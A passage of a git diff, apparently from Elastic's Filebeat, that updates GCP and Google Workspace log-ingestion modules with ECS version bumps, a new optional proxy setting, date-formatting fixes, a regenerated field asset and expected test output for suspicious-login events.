Firefox/71.0,gzip(gfe),gzip(gfe)", "user_agent.os.full": "Mac OS X 10.15", @@ -137,6 +138,7 @@ ], "user.email": "xxx@xxx.xxx", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)", "user_agent.os.full": "Mac OS X 10.15", @@ -189,6 +191,7 @@ ], "user.email": "xxx@xxx.xxx", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)", "user_agent.os.full": "Mac OS X 10.15", @@ -235,6 +238,7 @@ ], "user.email": "system:serviceaccount:cert-manager:cert-manager-webhook", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Other", "user_agent.original": "webhook/v0.0.0 (linux/amd64) kubernetes/$Format", "user_agent.os.name": "Linux" @@ -293,6 +297,7 @@ ], "user.email": "user@mycompany.com", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Other", "user_agent.original": "google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 19.6.0),gzip(gfe)", "user_agent.os.full": "Mac OS X 19.6.0", @@ -339,6 +344,7 @@ ], "user.email": "user@mycompany.com", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)", "user_agent.os.full": "Mac OS X 10.15", diff --git a/x-pack/filebeat/module/gcp/firewall/config/input.yml b/x-pack/filebeat/module/gcp/firewall/config/input.yml index cc914cedfca..05e4fc5c10e 100644 --- a/x-pack/filebeat/module/gcp/firewall/config/input.yml +++ b/x-pack/filebeat/module/gcp/firewall/config/input.yml @@ -38,4 +38,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/gcp/vpcflow/config/input.yml b/x-pack/filebeat/module/gcp/vpcflow/config/input.yml index fbcfc88a79a..ded34be1443 100644 --- a/x-pack/filebeat/module/gcp/vpcflow/config/input.yml +++ b/x-pack/filebeat/module/gcp/vpcflow/config/input.yml @@ -37,4 +37,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/gcp/vpcflow/manifest.yml b/x-pack/filebeat/module/gcp/vpcflow/manifest.yml index 1f67548e0db..4cd314d574f 100644 --- a/x-pack/filebeat/module/gcp/vpcflow/manifest.yml +++ b/x-pack/filebeat/module/gcp/vpcflow/manifest.yml @@ -2,7 +2,7 @@ module_version: "1.0" var: - name: input - default: google-pubsub + default: gcp-pubsub - name: project_id default: SET_PROJECT_NAME - name: topic diff --git a/x-pack/filebeat/module/google_workspace/admin/config/config.yml b/x-pack/filebeat/module/google_workspace/admin/config/config.yml index 8c2c3824ed7..ec18b343898 100644 --- a/x-pack/filebeat/module/google_workspace/admin/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/admin/config/config.yml @@ -11,11 +11,14 @@ request.url: https://www.googleapis.com/admin/reports/v1/activity/users/{{ .user {{ if .http_client_timeout }} request.timeout: {{ .http_client_timeout }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +30,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log @@ -45,7 +48,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/admin/manifest.yml b/x-pack/filebeat/module/google_workspace/admin/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/google_workspace/admin/manifest.yml +++ b/x-pack/filebeat/module/google_workspace/admin/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/google_workspace/drive/config/config.yml b/x-pack/filebeat/module/google_workspace/drive/config/config.yml index 18eacfef7a2..9f00099c8a6 100644 --- a/x-pack/filebeat/module/google_workspace/drive/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/drive/config/config.yml @@ -11,11 +11,14 @@ request.url: https://www.googleapis.com/admin/reports/v1/activity/users/{{ .user {{ if .http_client_timeout }} request.timeout: {{ .http_client_timeout }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +30,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log @@ -45,7 +48,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/drive/manifest.yml b/x-pack/filebeat/module/google_workspace/drive/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/google_workspace/drive/manifest.yml +++ b/x-pack/filebeat/module/google_workspace/drive/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/google_workspace/fields.go b/x-pack/filebeat/module/google_workspace/fields.go index a17ca4dd5a4..8ce7b296cf7 100644 --- a/x-pack/filebeat/module/google_workspace/fields.go +++ b/x-pack/filebeat/module/google_workspace/fields.go @@ -19,5 +19,5 @@ func init() { // AssetGoogleWorkspace returns asset data. // This is the base64 encoded gzipped contents of module/google_workspace. func AssetGoogleWorkspace() string { - return "eJzkXFtz3LaSfvev6EoevJuKRrV51MNWaS3FcUWyVZacbOrUKQoDNIeIQIAGwBnP+fWncOGIMyTnBsqe5OjFriHxfY3GrbvRzTN4wuUFzJSaCcwWSj+ZilB8BWC5FXgB320++u4VAENDNa8sV/IC/vcVAMBb/xr83rwGt4rVwgHlHAUzF/6tM5CkxF4+98cwJ7WwmW9yATkRpnlkl5Vrp1VdrV7uCNEriKmQ8pzTKMjk1erVW6URuMyVLomDATJVtd1sAJRImCLkqpYMiIXC2spcnJ8znKNQFWozCf2ZUFWeE1ZyeWbY07nGSmlrzuf/c64xR42S4jmhls+55WjOBTc2ytLWUVtPhFqlJ67vq0eNKp5wuVCatX4fUIj7eyjQNwOVR8xXa89/I6LGpqcXa48Afvh0f/3xhwu4lMoWqKE2qIFLsAWCISUCUyXhcrLZ7Pr/H64/vr+8yZr2oaWqreEMffOBlr9e/+Hfl0qeFXVJZCN0v36ecJmmng9SLKHSaFBaWBQo4fFZ84/ADTz+ev3H4wTehKngRH+kSpq6RJ094fLRKdb9qvFzjcYqDbnS8OGytgX8dPMBLu/eNc8MKA1EAmcoLc85hne1mioLhFJVS2u6XcU5SjvyVOisFU/yI5SkqpBBrlUJj9xiaf7xz4l/5v4TlRImgNJ8xiURUJGlUIStj+U1oQXkXKBB62dXQeYIBBjP/YKw4B6oHOZhAjpFcCeAW5kMLeHiq6w/94dfSFm5LY/UjNvv44vLzkA8ccnGG4IwMYyqNcUNxTuiPfV8e8L6UnpGJP+X32EnYcGnqS8oMCCBLYh1C5TkOVKLDKbLuBBdZ16buG66O4frdkeO9vkCPfvyGkJVCU5Dt5Bx9++GmEN96/TP9ae7FgPmZCe5+yWFuYX12nj83ZwoyVTgJvRBtBFiDXYnr+DUTUuTKc1QZ7Iup6iPleKDw4CA4c4mBlaBRoZYgicyaA4Qqao1LYg5XivvgyQqhwYTVpi75eBJo9FCgndXu9mIqbLxGFcmV0WMcY33kqEi9InMMFGOUk25WBcnAg8K4beJCZaEixRmD/PaQKV5SfQSPCAQxjSagYkncZH5szKFV+IiHLj+vPVmHFrL5ayfUwmWzqkEO4hTz7Jacpu8ubVPHyLAYW7Z4la0eS2ShlbpWeByQFARWwCXVNSMy1k4n5Syz28NS9RoKVUPEWcLkzPOM4Y5l8iysWhd+8Y2dgRnkWD76DcPW3Av2/ewoCvNlfa2zrFsbx0OPOP0s0WvhwhOjmZqmUAeZytT6ig2G1QkHNZj5DNIlWREL7P0aRuRdnOXRJIZsowqmfNZrUnqtGnP3QgOa+ADW7SSWY7E1tqvIz3nzjgwKJCmSLRpAwO8V/KsIYKGCFZEm141wM/O8QRnxrtuVcoYPhXY+F7e5ncW0BH+gnNbJONfGndhGV9rHapncRWa73++ubz/5ebd218esuurT9n7D++zn68vHz59vL7K7q8//vbuzfV9dn99c/3m4fqqV8XeLB9raD1Y/1A2jlmibdVmayBb7v/wdpxuYjiUwywMzys5fUpdupG6gdrCNuXaFozYfrqeB0NcHsg3GNjmicUFWSbth28DRtiI4C4GjZwNq0oE6tzRZqb3C0ELrUrMlJkYNIYrmW0EdQ4S541Hgw/3ENF804HdGd0WMTGoORGJvtOVx4KAFX2orawHLKGNlinqiWIO66TSXFq/TbtpP6K144EhAg9TvwTrjpGgqiyJZFmMFx098wJME3Ya2EGVSNk9P0n+ucbNUKktuPHIrrtzLnA2MLiePUW93UP3wdvuAnsMEfgmRyxDgW5fY2exWdx8hqZc1FeKVu4alK1+i7dHRvBbPM42v0WLZJYFTg2321gqrVhN0/3RiLMHk3mqxyC6//VTP8+0Fk9ZXflgck74UDRPKDnbL2gVQEAjVZoZ4NJTQKAAN8u3WM1taayypN/q2V8Yj3GkLMEbJEKoBbJsI+x90EC8JyUaf+nmwM4cFLKAP7Bhegtt8rkmmkjLJSZ7UO3T4Rl2G7lQs8wg0bTIci7caVKiMemBNqFmEHAh4L420SCN+IPxtiG5jCXaZkmWY59QHnaLGTkkDrpDdWxh3KYvZ0dIo5HyiqO0k+Tg3fDIPZMcNnAoGeqXFCwyHKkxXvVK1fn5GE29NvDubrsPtkNtLyBdQN5DtOi9rK5HEi+CugbWTXP1EZFPwcZSerbdrtrUSjw7/sO1okhti58mY5iCXY343IqfttiH30YpBmmtuV3upZlxru+iJva5wevhTRmVHuYtdytd7hTPfnBGtKXp+v2nPCvmqHkeRc9KtIUacQf5iMJ5iWskEEhOUkNA5GYPYVS/2d8nbB8QIlCnu3weZcvC0HVilMLHJOremMTztTmfUOFtm1Smy7t3EKB28BmqquOv0hqqgDJw5cPKiVVPmHTNc3t1C3OUTGlAqZUQpeuahx1mDQ3God2adMNlrpICxH0hLG5gwYWAKa7SXowlFmFREOsT3Nyyb2fGLogBWhA5Ow3TY5/F6w3brFSSW6UnDI3Nkq9THAqXMVk4mMmNbx092Ui3h0TCqWFCC3J0dMFJ5C8c1rghAO8tAdMkTxLBA6TJwCVVJe/Edg4So8FIk0TVdqYSJWkwDpWE1WU1CWkimDEUaAdciKlSAsnmrrcmxzvJ3CGPBngOESvQGCA+7d3TsCa/FL+4RbdTuibliippUabN3ABhnq/YuZiqL03y1U5RPteol2mhZe8Je5ywDzapSR6//6wOOdyJF8IRZdBMDylpE0JHSOyL6W3h7gcCpPPz96Ie++AZFOdUDPUg3vaDJaqIorbBkk633qJWWpBAVVlu9acaMVRZEbnM1EIiy4Je+42uXcFzHy1eBdAjEhCIDKAWcijNiBur+bSOqcGW27Q79v6p02aBwBKmwo+wKDgtmsR3EgLsMfLtay2Unp0NJNqd7jzr0+r4C7JPqw5yQKnr+jxlVa7UqPm8WzNzSKb/lAtBpqJf8Xucxb8X6Aun/L11Iz1wswIeuEL1iUJZrgRDfcjdSz+AL+g7GKNl8SZI0oNynDg5PyyfYK3duIvnStHau4pXboKFE+yrTv/Nid1OY/bFQm49ZKRKSdTv3zNircoboWoGd1r9idQZM40ltxaBc/5Jhdq5ks7TLJpDv3/O+3FyR9mhuW89ANxkpiDanYodTR2wersq+L/QCHJBZsBQKp9dvIir3JP7kiQI9GEHGswBKoleZr5KaTwJ13YcL8oqA9CXQ8ElGC7dGPqSzDAizhUIc7kkS5ihRO0MEYNz1ESElgMGQFvPo8+2upMEFOfZA5IySDyJJZyqqkOUM48VmEFo0Cj8anBrj7Taga83xNI7I8QnpnPpq1Pbb/X3ec4Nn3LRLnlL7u5vK0zfR6JnaMOUPpGdJbn+pHeuSrdWYpK+0lBpJ3jUgc/QFRijT+ZH/8t6BQu3IZzlOkI0FKiHriBSK1nGkX69FmZv6U2BaE3GSzdymXaA2epWOWOKHturK0Vbu/cK0uetRFYIrOBZtyj3BdaE1/AzcFuV3EChBDPrWt21XLOA8PUldLNW+c1UtF9vzZN+0cM+kHVqZxPFbpWQuHkYzP1wQFOKxoTQ+1roN8SOnUtAhFFNKbwvQAHXK6uAx8BTg9QL5Aldg8Bvgpngi8NbilnlerJoag3cNTCGLNPqAHNyp24uHSaU6LxhU/Aq5Hz6BeFOzPPgDHG55ZyAr+wNDW/az92IU3/sC4VYyx7AnVZaJ2xLhxvqO1V1rRkzjVv5DTTXX0ZwOnrSWKr56CvvY0D9u6y9sHcfHRsMFmD4boqGjWXTCXWExNKkWAehIqtQl9wXk4w3rLEycoW8spjqijmL/duOX0dxGzcOY+shJPht2azTKr+6tLcedQ/ecRdzpPV1GKc6wHEijj3Ef5X5/QIe3fvGO/sv89+NdTtrK+VklZHqIHb69aFxSv5yqhh5TvgvjP21NBCrEhLuX7tquL99uHsud/BpNkSuV0F09dEUmTp/qFQs1q5sDcg1WM+vZ2Tk8vPb2IuWRH2RXd+BjSEkGuGRVJV2lt4jEMngUeOf/gNOjwPBD0tsfXQyWY+DFxHje9PmuxyqtlVt47gM1AkNdilUQMUOmZpSRLbWo47FJtQs9TNU8cNXIbkpi1lJB8fNaUGEQOfhjJ14euO6+Izf5Jx+1VXu1Txw40C4qPXYjl3odMT+BndDWzr8Eh2lGn10nghzWp3lJgufEMly/0XH3o73XbG0AWpTccrVwPaz2Xq1Y5FSpK3s52u0pCrAnlOIlALu7/ZM3P97rhA3PEMpt9xyZ7Nn0xHD2B9Dzle4vbq/vL0BUtvCLZpt375TelZLbrOK2GI8WQA+hYjCrJvEsX7gZlSx/kHflU3UM+tcp+Op62CHCsf9cvXJktlLCeE5QkLmukT/DgAA//9gcf1M" + return "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" } diff --git a/x-pack/filebeat/module/google_workspace/groups/config/config.yml b/x-pack/filebeat/module/google_workspace/groups/config/config.yml index 6d713ebdb29..261f412a104 100644 --- a/x-pack/filebeat/module/google_workspace/groups/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/groups/config/config.yml @@ -11,11 +11,14 @@ request.url: https://www.googleapis.com/admin/reports/v1/activity/users/{{ .user {{ if .http_client_timeout }} request.timeout: {{ .http_client_timeout }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +30,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log @@ -45,7 +48,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/groups/manifest.yml b/x-pack/filebeat/module/google_workspace/groups/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/google_workspace/groups/manifest.yml +++ b/x-pack/filebeat/module/google_workspace/groups/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/google_workspace/login/config/config.yml b/x-pack/filebeat/module/google_workspace/login/config/config.yml index 3ce48abe77b..137450f2ad4 100644 --- a/x-pack/filebeat/module/google_workspace/login/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/login/config/config.yml @@ -11,11 +11,14 @@ request.url: https://www.googleapis.com/admin/reports/v1/activity/users/{{ .user {{ if .http_client_timeout }} request.timeout: {{ .http_client_timeout }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +30,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log @@ -45,7 +48,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/login/config/pipeline.js b/x-pack/filebeat/module/google_workspace/login/config/pipeline.js index 9f9610393f1..a7b54afd43e 100644 --- a/x-pack/filebeat/module/google_workspace/login/config/pipeline.js +++ b/x-pack/filebeat/module/google_workspace/login/config/pipeline.js @@ -64,7 +64,7 @@ var login = (function () { // this is a timestamp in microseconds case "timestamp": var millis = p.intValue / 1000; - evt.Put("event.start", new Date(millis).toUTCString()); + evt.Put("event.start", new Date(millis)); break; case "challenge_status": if (p.value === "Challenge Passed") { diff --git a/x-pack/filebeat/module/google_workspace/login/manifest.yml b/x-pack/filebeat/module/google_workspace/login/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/google_workspace/login/manifest.yml +++ b/x-pack/filebeat/module/google_workspace/login/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json index 48f7038df80..a4e0f480040 100644 --- a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json @@ -55,6 +55,174 @@ "user.target.email": "foo@elastic.co", "user.target.name": "foo" }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "suspicious_login", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 406, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "suspicious_login_less_secure_app", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": 